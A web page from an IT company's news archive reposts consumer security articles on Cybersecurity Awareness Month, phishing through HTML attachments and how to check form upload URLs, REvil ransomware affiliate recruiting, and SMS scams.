+44 (0)20 86848683

Perpetual IT

Category Archives: News

News

If you connect it, protect it

by

If you connect it, protect it” is a short and simple slogan that we’ve taken straight from this year’s Cybersecurity Awareness Month (CSAM).

We wrote about CSAM last week, on the first of the month, to explain why we think CSAM is still worth supporting, for two main reasons.

The first reason is that it’s an annual prod to all of us to reach out to our friends and family who still think that “it’ll never happen to me”, or that “I’m too unimportant for the crooks to go after my data.”

The thing is, as we explained last week, that the crooks don’t have to “go after you” to get hold of your data.

After all, they might get hold of it, along with personal information about thousands or even millions of other people, as the side-effect of a blunder by a company that didn’t protect its customers’ data well enough.

And if they do get hold of any PII (personally identifiable information), there’s very little to stop them using it against you right away, or from passing it on as a “data dump” to other crooks to use for nefarious purposes.

Many cybercrimes that are dubbed targeted attacks happen the other way round to how many people think of them.

Simply put, sometimes the crooks come after you because you happen to be the next person on their list, not because they chose specifically to dig into your affairs in order to get you onto the list.

The second reason to support CSAM is that it’s a handy reminder to review all the cybersecurity precautions that you’ve already taken, or think you’re taking, to make sure that they’re actually working as you intended.

For example, wherever you’ve turned on automatic updating, why not take the time to go and review all your recent updates?

If you’ve been making regular backups throughout the year, do you still know how to mount and restore them safely and quickly if the need arises?

How about all those home devices you’ve installed recently, from internet-enabled doorbells to smart electricity meters and home thermostats?

For example, you may have enabled data collection features (what’s known as telemetry in the jargon) that you thought would be useful and that you’d use regularly, but that you haven’t used at all and therefore might as well turn off.

What to do?

You can use CSAM, which gets enough publicity that you are unlikely to miss it even if you don’t put it in your own diary, as an incentive to do all of the following:

  • Make sure your own cybersecurity precautions are up to scratch. Best-practice advice may have moved on since last year, so take the opportuntity to go and check if last year’s precautions are still considered good enough, or whether you ought to make any useful improvements.
  • Make sure your own cybersecurity precautions are working as you intended. Don’t just assume that your router has the latest firmware or that your Java Runtime Environment is up to date. Go and take a look and mark it off your list.
  • Make sure your own cybersecurity precautions are a good example to others. For instance, if your website still doesn’t have a TLS certificate, go and get one; if you’ve been putting off adopting 2FA or updating your passwords from secret99, go and do it now.

Remember: if you connect it, whether it’s a computer, an IoT device or an online account, protect it!

Even if you don’t think it’s necessary for “little old you”, please do it for the rest of us, because cyberinsecurity on your part affects everyone else, too.

Oh, and do it because friends don’t let friends get scammed.

News, Phishing

Serious Security: Phishing without links – when phishers bring along their own web pages

by

In the past few days we received two phishing campaigns – one sent in by a thoughtful reader and the other spammed directly to us – that we thought would tell a useful visual story.

As far as we can tell, these scams originated from two different criminal gangs, operating independently, but they used a similar trick that’s worth knowing about.

The phishing scammer’s three-step

Most straight-up email phishing scams – and you’ve probably received hundreds or even thousands of them yourself in recent times – use a three-stage process:

  • Step 1. An email that contains a URL to click through to.

The message might claim to be telling you about an unpaid electricity bill, an undelivered courier item, a suspicious login to your online banking account, a special offer you mustn’t miss, or any of a wide range of other believable ruses.

Sometimes the crooks actually know your name and perhaps even your phone number and your address.

Sometimes the criminals are flying blind and stick to phrases such as “Dear Customer”, “Dear Sir/Madam” or even just “Hello.”

Sometimes they know the name of your electricity provider or bank; sometimes they don’t know but happen to guess correctly; sometimes they fudge the issue by writing some generic text that’s just enough to get your interest.

The email message doesn’t have to say a lot – all it needs to do is catch you at a weak moment so you click the link.

Clicking a phishing link ought to be safe enough on its own, provided you’re careful about what happens next, but it inevitably takes you one step closer to trouble.

  • Step 2. A web page where you need to login to go further.

Usually, after you’ve clicked through, there’s a password page, and often it’s a surprisingly good clone of the real thing, created simply by pirating the HTML, images, fonts, stylesheets and JavaScript from the genuine site and installing it somewhere else.

The imposter pages will often be sitting on a legitimate website that’s been hacked to act as a believable springboard for the attack.

Unpatched blogging sites are popular to hack because the crooks can often find somewhere perfectly innocent-looking and unlikely to be noticed, deep in the directory structure of the real site where a few extra images and HTML files won’t attract the attention of the site’s legitimate operator.

Or the imposter pages may be part of a short-lived web hosting account – perhaps set up just a day or two before as a “free trial” that will probably be shut down quickly, but not before the crooks will have cut and run anyway.

  • Step 3. A web site where the data you put into the login form gets sent.

Sometimes the “drop site” for the stolen data will be uploaded to the same site used in (2); sometimes the crooks use a third site that may be collecting data from several different phishing campaigns at the same time.

Technically speaking, the clickable link to site (2) appears inside email (1) as what’s known as a hyperlink, encoded into HTML using a so-called anchor tag, written as <A ...>, like this:

The text between the <A> and the </A> usually appears in your browser in blue to denote you can click it to follow a hyperlink jump to somewhere else.

But the clickable text itself isn’t where you go next.

The target of the link, often a URL pointing to another website, is given by the HREF=... value that appears along with the <A>:

(In you want to use the right jargon, you need to known that the <A> part is known as a tag, for which </A> is the matching closing tag. The HREF=... part is referred to as an attribute of the tag.)

Finding the password stealer

Usually, the fake login form that performs the password-stealing part of a phishing scam appears somewhere in the phoney web page on website (2).

So, if you ever need to go looking for the bogus login form, you’ll generally find it on site (2), which, as we just explained, is generally referenced by an HREF=... attribute in email (1).

This time, you’re looking for an HTML tag called <FORM>, and instead of using an HREF=... to denote the URL they’re linked to, form tags have an attribute called ACTION=... that tells your browser where to upload the completed form when you finish:

The button that finishes off your data entry and confirms you want to upload the data you just entered is denoted inside the form by an <INPUT> tag with an attribute that says TYPE="submit", as in the example above.

You might expect that hovering your mouse over the submit button in a form would pop up to show you where your data is going next, in the same way that it does when you hover over a hyperlink, but sadly no browser we know of does this:

Cutting out the middleman

The phishes that we mentioned at the start, one received directly by us and one kindly reported by a reader, worked on the three-step principle we’ve just described.

But there was one important difference.

Step (2), the cloned website with a phoney login page on it, wasn’t reached by clicking a link in the email.

Instead, the bogus web page was brought along for the ride as an HTML attachment, like this:

Opening the attachment doesn’t feel terribly dangerous – after all, it’s not a document that could contain macros and it’s not a PowerShell file or an executable program that could wreak instant havoc.

In theory, opening an HTML attachment should simply open up the enclosed web page in the comparative safety of your browser’s sandbox, as if you had clicked a link.

Like this:

When you open an HTML attachment like this, instead of clicking a conventional web link, there are two huge differences:

  • There is no link in the email that you could have checked out in advance to look for a fake or suspicious domain name.
  • The URL in the address bar is a harmless looking local filename, with no website name or HTTPS certificate you can examine for signs of bogosity.

There are other reasons not to open HTML attachments, notably to do with JavaScript. For safety’s sake, script code inside HTML emails is stripped or blocked when any modern email reader displays the message. That’s a precaution that email software introduced decades ago when self-spreading script viruses such as Kakworm literally spread everywhere. Kakworm’s script code would activate and the virus would spread as soon as the email was displayed, without waiting for you to click any further. When you open an HTML attachment, however, it is no longer under the strict controls of your email client software, and any JavaScript inside the HTML will be allowed to run by default by your browser.

Here’s another example, this time pretending to be a payment processed by SWIFT, a well-known international processing service for financial transactions. (International bank identification codes, now officially BICs are still widely know as SWIFT codes.)

Of course, neither Microsoft nor SWIFT had anything to do with this email, and there isn’t any payment you need to know about.

The message is just a ruse to make you wonder what’s going on here, and opening the attachment brings up a fake login page designed to phish your password:

The innocent address bar

With no clickable link to give the game away, the browser’s address bar is the obvious place where you’d look to try to verify the web page you just landed on.

As you can see above, the website details that show up for HTML attachments opened locally are just local URLs, starting with file:// instead of http:// or https://.

There’s no encryption to look for, and no TLS certificate you can check, because all you’re really doing is browsing a local temporary file.

In our case, they had names that are unexceptionable enough that we didn’t even bother to redact them in the images above:

file:///tmp/mozilla/Proforma Invoice.html
file:///tmp/mozilla/Payment 66603635.html

The URLs above are what we saw when we ran our test using a Linux email client and with the Firefox browser, but the results are similar on other platforms.

On Windows, for example, you’ll see something like this:

Tracking the FORM data

As explained above, filling in the forms in the fake HTML pages above will send off your password to websites controlled by the criminals.

Of course, email passwords are amongst the most valuable credentials for crooks to acquire, simply because many people use their email account for password resets on a multitude of other accounts.

So, criminals with control over your email account can probably wrest control of many of your other accounts, too, because any password reset emails will end up where the crooks can access them before you even realise that they’re taking over your digital life.

But how to check where a form in a web page will send your data when you submit it?

Unfortunately, we don’t know of any easy way that’s built in to any browser, but you can use your browser’s Developer Tools to do the trick.

In Edge, for example, pressing F12 and choosing the Elements tab will show you a visual view of the HTML structure of the web page:

Searching for the text ACTION (the search doesn’t care whether it’s upper or lower case) should reveal any URLs associated with forms on the page, as you see here:

We’ve redacted the URL here, but we will say that it very obviously had nothing to do with any Microsoft product or service, and immediately outed the login form as fraudulent.

In Firefox, the process is similar: Ctrl-Shift-I will bring up Mozilla’s Inspector toolbox.

Choose the Inspector tab and search for ACTION, and you should be able to track down the URLs used for data upload by any of the forms in the page:

In Safari on a Mac, the key combination to bring up the Inspector is Option-Command-I, after which a search will show you any occurrences of ACTION in the HTML source of the page:

What to do?

The good news is that you don’t need to learn a whole new set of precautions to protect yourself from bring-your-own-webpage phishing scams.

Here’s what to do:

  • Avoid HTM or HTML attachments altogether unless they’re from someone you know and you are expecting them. We can’t recall ever receiving an emailed-in web page that wasn’t trying to trick us.
  • Avoid logging in on web pages that you arrived at from an email, whether you clicked on a series of links or opened an attachment to get there. If it’s a service you already know how to use – whether it’s your email, your banking site, your blog pages or a social media account – learn how to reach the login page directly. If you always find your own way to your account login pages, you’ll never be tempted by fakes.
  • Turn on 2FA if you can. Two-factor authentication means that you need a one-time login code, usually texted to your phone or generated by a special app, that changes every time. 2FA doesn’t guarantee to keep the crooks out, but it makes your password alone much less use to them if they do manage to phish it.
  • Change passwords at once if you think you just got phished. The sooner you change your current password after putting it into a site you subsequently suspect, the less time the crooks have to try it out. Similarly, if you get as far as a “pay page” where you enter payment card data and then realise it’s a scam, call your bank’s fraud reporting number at once. (Look on the back of your actual card so you get the right phone number.)
  • Use a web filter. A good anti-virus solution (Sophos Home is free for Windows and Mac) won’t just scan incoming content to stop bad stuff such as malware getting in, but will also check outbound web requests to stop good stuff such as passwords getting out. Even in “clickless” attacks like this, the password exfiltration relies on an outgoing web connection that a web filter could block.

News

#BeCyberSmart – why friends don’t let friends get scammed

by

Cybersecurity is important.

In fact, it was already important way back in the years before cybercriminals started making money out of malevolent software – before we needed terminology such as phishing, botnets, attack chains, exploit kits, spyware and ransomware.

Back when computer viruses were almost entirely about showing off to imaginary chums, or having a destructive joke at everyone else’s expense on Friday the Thirteenth by deleting their programs one by one…

…well, even back then, cybercrime (as we unexceptionably call it now) was neither witty nor innocent.

Then, starting in about 2000 or 2001, cybercrooks figured out not only how to spread mayhem with malware, but also how to make money illegally, too.

Lots of money. Lots and lots and lots of money.

At the start of the 2000s, crooks were scamming $100 a time with popups for fake charities to which you’d send money for bogus good causes; by the end of the decade they were stealing payment card numbers and helping themselves directly to $1000 or more at a time; in 2020 they’re into blackmail in a big way by stealing or scrambling your data and extorting you into buying it back for $1,000,000 a time.

The worst of it is that cybercrime directly affects all of us.

No matter how unimportant we might feel in the digital economy, or how little we think we might have for cybercrooks to take, we all have data that’s worth something to cybercrooks – and there are whole swathes of the cyberundergound getting wealthy at our expense just by stealing data to sell on to someone else.

Simply put: a cybersecurity injury to you can quickly turn into a cybersecurity injury to everyone else.

How to help

How can you help?

Well, one way is to support Cybersecurity Awareness Month, or CSAM for short, in your part of the world.

Yes, CSAM is getting on a bit – it’s now in its 17th year (it started in the US back in 2004), so you’ll find cynics who say, “But it’s just the same old tired advice recycled every year by people who can’t think of anything better to say.”

We disagree, because the basics are still important, and we still haven’t got them fully sorted out anyway.

Here’s what we said seven years ago to the day, when CSAM hit its tenth year:

Cybersecurity matters because there is a whole underweb of cybercriminals waiting to take money out of our economy if we give them half a chance.

So let’s make an effort to give them less than half a chance.

As we’ve said before, treat Cybersecurity Awareness Month as an incentive to change your digital lifestyle for the better, on a long term basis.

And that’s what we’re saying again.

Sure, some of what you hear in CSAM will be cute but basic phrases you’ve heard before, such as advice to “pick proper passwords“, encouragement to “stop – think – connect” before leaping onto websites and filling in personal data, and reminders that “if in doubt, don’t give it out.”

But even if you already do all of those things yourself all the time, what about your friends? Your family? Your colleagues?

Your attitude can help them improve their cybersecurity too, so our motto for CSAM 2020 is this: FRIENDS DON’T LET FRIENDS GET SCAMMED.

Or, in the words chosen for this year’s CSAM in the US, Do your part. #BeCyberSmart.

Because an injury to one is an injury to all.

News

REvil ransomware crew dangles $1,000,000 cybercrime carrot

by

Sadly, we’ve written many times before about RaaS, short for Ransomware-as-a-Service:

That’s where the crooks who actually write the ransomware keep themselves out of the limelight by hiring in other crooks to identify victims, get into their networks, spread the malware and trigger the damage:

The operators themselves then collect the ransom payments from a distance, squeezing the victims for payment using one or another form of mostly-anonymous cryptocurrency.

The spamming, phishing, scamming, hacking, malware unleashing and attacking part of the operation – the hands-on part, if you like – is left to a crew of affiliates.

Perhaps unsurprisingly, the crimeware-as-a-service ecosystem seems to have settled on the same sort of divide-the-spoils arithmetic used by Apple and Google in the App Store and the Play Store, perhaps simply because it’s a ratio that everyone is familiar with.

In general, each affiliate gets a 70% cut of the turnover they bring in themselves, while the crooks get 30% of everyone’s ill-gotten gains.

One of the well-known names in the RaaS scene is a gang known as REvil, and – worryingly for the rest of us – they’re hiring, allegedly “depositing” $1m up front into the payment pot of an underground hacking forum as an incentive to attract new partners-in crime.

As security researcher @Raj_Samani tweeted earlier today:

 Thus we: 1. Expand the composition of the teams of acting advertisers with talented people; 2. We invite ready-made lineups to work with us; All this is aimed at one thing - to increase the quality and quantity of waste material, which entails an increase in profits. But this does not mean that everyone will be accepted. For your peace of mind and confidence, we have made a deposit of 1 million US dollars.

As we’ll explain below, the curiously mangled phrase “to increase the quality and quantity of waste material” doesn’t just refer to the ruined files that a ransomware attack leaves behind after they’ve been scrambled with a cryptographic key known only to the crooks.

It almost certainly also refers to the confidential files that the infiltrators now steal up front and threaten to dump in public to embarrass your company, to incite the wrath of your customers, or to leave you facing a regulatory enquiry.

Unless you pay up.

What skills do you need to apply?

As reported by security news site Bleeping Computer, the REvil crew are explicitly looking for:

 Teams that already have experience and skills in penetration testing, working with msf / cs / koadic, nas / tape, hyper-v and analogues of the listed software and devices.

In case you’re wondering, the first three abbreviations above refer to so-called grey hat tools – software products created for cybersecurity research and testing purposes but that are just as widely used for evil:

They’re sold or given away as legitimate security tools so you can see if your own network is secure, and then improve your protection if it isn’t.

As you can imagine, however, these same tools are of inestimable value to cybercriminals too, who use them to see if your network is secure, and then break in automatically if it isn’t.

  • MSF is Metasploit Framework, an automated attack-and-exploit toolkit available in free and paid versions.
  • CS stands for Cobalt Strike, a paid-only product that describes itself as offering “advanced threat tactics for penetration testers”. (As far as we know, the crooks don’t bother to pay for it, though we suspect they could easily afford if if they had to.)
  • Koadic is an open source penetration testing tool that is, by its own account, a “Windows post-exploitation rootkit”.

NAS (network attached storage) and tape, of course, are two popular backup technologies that today’s ransomware attackers try to identify on your network and wipe out in advance to make it harder for you to recover on your own.

And Hyper-V is Microsoft’s virtual machine (VM) software, commonly used on Windows networks to let powerful servers pretend to be multiple computers at the same time, allowing IT teams to scale their server workloads up and down as needed.

Typically, you can’t scramble the files that act as the virtual hard disks in use by each VM on a server because they’re in use and locked by the virtualisation software.

But if you can infiltrate the management tools that may be looking after dozens of hundreds of VMs at the same time, you can attack the VMs “from inside” just as if they were regular computers containing regular files.

Ironically, virtualisation tools are now being used by ransomware criminals themselves, with VMs sneakily fired up in which the crooks can run their ransomware without exposing its files or processes directly to the security scrutiny of the host computer that they’re about to attack:

What’s the backstory?

We wrote last year about the alleged end of an infamous ransomware-as-a-service group known as GandCrab – a shutdown occasioned, sadly, not by the arrest and conviction of the crooks but by their own claims that:

All the good things come to an end. […] Earnings with us per week averaged $2,500,000. We personally earned more than 150 million dollars per year. [… We are leaving for a well-deserved retirement.

However, even though the twisted history of ransomware groups can be hard to follow – at least, those who haven’t been caught and prosecuted – it looked as right away as though the report of the gang’s demise was a scam all of its own, and that they almost immediately returned with a ransomware strain known as Sodinokibi.

Or, to use its other name, REvil:

Back then, Sodinokibi ransomware demands were running at about $2500 per computer, jumping to $5000 after four days.

How times change

As you probably know, extortion demands don’t really work like that any more.

Ransomware gangs, including the REvil crew, have taken to setting up attacks on one or just a few networks at a time, rather than trying to scramble thousands of computers individually in a widespread attack.

The attackers can then “negotiate”, if that is the right word, directly with the IT teams or the CISOs who look after the networks they do manage to breach, and if the criminals have locked up all the computers in one company at the same time, they have much more leverage.

As a result, they’re often demanding six-figure or even seven-figure sums each time.

(Less than two weeks ago we wrote about an attack by the Maze ransomware criminals where a astonishing eight-figure demand was made, with the crooks opening the bidding at $10,000,000. In that case, the victim refused to pay.)

As we mentioned above, ransomware attacks are now routinely preceded by a data-stealing binge by the attackers, so that victims are faced with two-pronged extortion demands.

These days, the criminals don’t just squeeze you to pay up for the decryption key to unscramble your whole network and get your business going again.

They also menace you to pay for their “co-operation” in deleting the data they stole instead of leaking it to the world, or auctioning it off to other crooks, or both.

It’s a bit like being kidnapped and blackmailed at the same time: even if you have a way out of one crisis, such as a recent and reliable backup to recover your own files, the crooks have a second hold over you.

Suddenly, and rather shockingly, that million-dollar “investment” by rhe REvil crew sounds like up-front money that the gang can easily afford and expect to recoup quickly, possibly even in a single well-planned attack.

What to do?

Instead of offering you a list of technical tips, we’re simply going to reiterate what our chums at Bleeping Computer already said.

Don’t pay.

If the worst should happen, do your very best not to get squeezed into paying up.

If you will afford us the chance to be upbeat about it, we’d like to repeat what we said earlier this month to encourage companies not to reach for the giant-sized chequebook straight after a ransomware attack:

 If you get hit by ransomware It means you've had a breach. The world might get judgmental And want to point and screech. But if, despite the blackmail threats, You tell the crooks, "Hell, no!" Then we give you a big, loud cheer And say to you, "Chapeau!"

News, Phishing

Naked Security Live – “SMS scams: keep yourself and your family safe!”

by

We do a show on Facebook every week in our Naked Security Live video series, where we discuss one of the big security concerns of the week.

We’d love you to join in if you can – just keep an eye on the @NakedSecurity Twitter feed or check our Facebook page on Fridays to find out the time.

It’s usually about 18:00 UK time, which is early afternoon/late morning on the East/West coast of North America.

Note that you don’t need a Facebook account to watch our live streams, although you will need to login if you want to ask questions or post comments.

For those of you who [a] don’t use Facebook, [b] had buffering problems while we were live, [c] would like subtitles, or [d] simply want to catch up later, we also upload the recorded videos to our YouTube channel.

Here’s last week’s video, where we showed you how to keep yourself, and your friends and family, safe from phishing scams that arrive via SMS – what’s colloquially known as “smishing”:

[embedded content]

(Watch directly on YouTube if the video won’t play here.)

Thanks for watching… hope to see you online later this week!

Latest Blog

View All
go top